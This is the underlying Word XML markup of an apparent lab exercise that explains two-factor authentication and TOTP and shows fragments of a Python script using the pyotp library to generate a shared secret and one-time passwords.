                <v:shape id="Graphic 81" o:spid="_x0000_s1027" style="position:absolute;width:61722;height:203;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6172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2zwwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvBb/D8oTe6sY/FImuUhTBq7YHvb1kX5O02bcx+zTpt3cLgsdhZn7DLNe9q9WN2lB5NjAeJaCI&#10;c28rLgx8fe7e5qCCIFusPZOBPwqwXg1elpha3/GBbkcpVIRwSNFAKdKkWoe8JIdh5Bvi6H371qFE&#10;2RbatthFuKv1JEnetcOK40KJDW1Kyn+PV2cgm52E5ac/H7Zdvb0Uu+wynWTGvA77jwUooV6e4Ud7&#10;bw3Mx/D/Jf4AvboDAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAmXXts8MAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m6172200,l,,,20320r6172200,l6172200,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 82" o:spid="_x0000_s1028" style="position:absolute;left:6170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7r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 83" o:spid="_x0000_s1029" style="position:absolute;left:3;top:9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9OxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvhf6H8AreNNsK1q5G0YKgB1tqZcHbY/PcLN28LEnU9d8bQehxmJlvmOm8s404kw+1YwWvgwwE&#10;cel0zZWC/e+qPwYRIrLGxjEpuFKA+ez5aYq5dhf+ofMuViJBOOSowMTY5lKG0pDFMHAtcfKOzluM&#10;SfpKao+XBLeNfMuykbRYc1ow2NKnofJvd7IKCu/N4vtru6TNsD3U71nxsQyFUr2XbjEBEamL/+FH&#10;e60VjIdw/5J+gJzdAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAOeYT07EAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m3048,3035l,3035,,16751r3048,l3048,3035xem6173152,r-3035,l6170117,3035r3035,l6173152,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 84" o:spid="_x0000_s1030" style="position:absolute;left:61704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5r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 85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7r3047,l3047,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 86" o:spid="_x0000_s1032" style="position:absolute;left:3;top:176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FyxQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gQvpdlUSpTUVcQSEHqxammPj+xrEsy+XbJrEv99t1DwOMzMN8xqM5pW9NT5xrKC5yQF&#10;QVxa3XCl4HwqnpYgfEDW2FomBTfysFlPHlaYazvwB/XHUIkIYZ+jgjoEl0vpy5oM+sQ64uj92M5g&#10;iLKrpO5wiHDTynmaZtJgw3GhRke7msrL8WoiJXO7xsw/3fV8eDl83Yr3x7fvhVKz6bh9BRFoDPfw&#10;f3uvFSwz+PsSf4Bc/wIAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCnZRFyxQAAANs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3E2A69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EDE505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78" w:line="284" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Develop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two-factor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>authentication (2FA)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  <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pyotp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1777D9B8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="exact"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE826B5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4421D6CE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="232" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="783"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Aim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two-factor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2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(2FA)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pyotp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-60"/>
          <w:sz w:val="20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which generates time-based one-time passwords (TOTP) for added security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613A69C9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18F932C4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="1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2B1D4E83" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E59D21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76DE197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3" w:line="268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pyotp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rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>library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generating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OTPs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4183EB4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7CE514B8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7B58DD90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8052F9B" wp14:editId="6A002725">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>297379</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6173470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1704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520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1704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284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09F1D" id="Group 87" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:23.4pt;width:486.1pt;height:1.6pt;z-index:-15721472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&#10;rAcAAAAA&#10;">
                <v:shape id="Graphic 88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f9KvwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE+5jsIw&#10;EO2R+AdrkLYDB4pdCBiEOMSWXBLtEA9JIB6H2EDg63GBRPn07tGkNoW4U+Vyywq6nQgEcWJ1zqmC&#10;/W7Z7oNwHlljYZkUPMnBZNxsjDDW9sEbum99KkIIuxgVZN6XsZQuycig69iSOHAnWxn0AVap1BU+&#10;QrgpZC+KfqXBnENDhiXNMkou25tRcNzr+XU96P3p9Hk6LFbnFx3ppdRPq54OQXiq/Vf8cf9rBf0w&#10;NnwJP0CO3wAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAAAAAA&#10;AAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQA5qf9KvwAAANsAAAAPAAAAAAAA&#10;AAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA8wIAAAAA&#10;" path="m6172200,l,,,19685r6172200,l6172200,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 89" o:spid="_x0000_s1028" style="position:absolute;left:61704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5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fkwgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/Pa8Iw&#10;FL4P9j+EN/A2023gtJoWHQz04MZUCt4ezbMpa15KErX+9+Yw2PHj+70oB9uJC/nQOlbwMs5AENdO&#10;t9woOOw/n6cgQkTW2DkmBTcKUBaPDwvMtbvyD112sREphEOOCkyMfS5lqA1ZDGPXEyfu5LzFmKBv&#10;pPZ4TeG2k69ZNpEWW04NBnv6MFT/7s5WQeW9WX5/bVe0eeuP7XtWzVahUmr0NCznICIN8V/8515r&#10;BbO0Pn1JP0AWdwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCSk0fkwgAAANsAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m3048,3035l,3035,,16751r3048,l3048,3035xem6173152,r-3035,l6170117,3035r3035,l6173152,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 91" o:spid="_x0000_s1030" style="position:absolute;left:61704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5r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 92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7r3047,l3047,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 93" o:spid="_x0000_s1032" style="position:absolute;left:3;top:172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Q3xQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5Qm9lGZTK1ZjVikWoeBFo9IeH9lnEpp9u2RXjf++WxA8DjPzDZMvetOKM3W+sazgNUlB&#10;EJdWN1wp2O9WLxMQPiBrbC2Tgit5WMwfH3LMtL3wls5FqESEsM9QQR2Cy6T0ZU0GfWIdcfSOtjMY&#10;ouwqqTu8RLhp5TBNx9Jgw3GhRkfLmsrf4mQiZeyWjRke3Gm/GW2+r6v18+fPu1JPg/5jBiJQH+7h&#10;W/tLK5i+wf+X+APk/A8AAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAyyyQ3xQAAANs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38CDEF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="21"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D40FD99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714DC420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Two-Factor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
        </w:rPr>
        <w:t>Authentication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(2FA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F69EF0B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="55"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E0456BC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Two-factor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(2FA)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of identification to access an account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778026B0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A591737" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1078"/>
        </w:tabs>
        <w:spacing w:line="267" w:lineRule="exact"/>
        <w:ind w:left="1078" w:hanging="358"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Something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know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password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PIN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DC5467" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1078"/>
        </w:tabs>
        <w:spacing w:line="267" w:lineRule="exact"/>
        <w:ind w:left="1078" w:hanging="358"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Something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you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have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one-time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password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(OTP)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app.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9EA878" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB1CE25" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="360" w:right="258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2FA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TOTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>(Time-based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>One-Time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Password)</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>which is a common method where the OTP expires after a short period of time (usually 30 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423E5761" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CAAFA54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12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Installing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ourier New"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pyotp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-71"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76525D67" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="61"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50D6200B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pyotp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-62"/>
          <w:sz w:val="2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OTPs. Install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pip:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419827ED" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05409873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pyotp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A253617" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="194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Script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for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5"/>
        </w:rPr>
        <w:t>2FA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2098E0AE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F04243" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>We</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>will 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 xml:space="preserve">system </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>where:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532AD004" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C7B14D4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26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b/>
        </w:rPr>
        <w:t>server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generates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-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DAC7A9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1078"/>
        </w:tabs>
        <w:spacing w:before="1"/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b/>
        </w:rPr>
        <w:t>client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generates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secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2A4C2D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26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b/>
        </w:rPr>
        <w:t>server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verifies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submitted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window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB93384" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="15"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14FA0847" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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(two_factor_auth.py):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571C3D8B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="41"/>
        <w:ind w:left="360" w:right="8395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pyotp import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7171EEB6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ADFA791" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360" w:right="486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2FA def generate_secret():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312C2B6F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="4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(this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 xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068B1F4A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totp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pyotp.TOTP(pyotp.random_base32())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223C04D2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1A2D6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83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secret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totp.secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3520CE93" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="840" w:right="4861"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print(f"Your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is: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{secret}") return secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A1A75B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226"/>
        <w:ind w:left="36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(this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typically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done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client) def generate_otp(secret):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429E329D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totp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pyotp.TOTP(secret)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0881BC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totp.now()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valid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based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 print(f"Generated OTP: {otp}")</w:t>
      </w:r>
    </w:p>
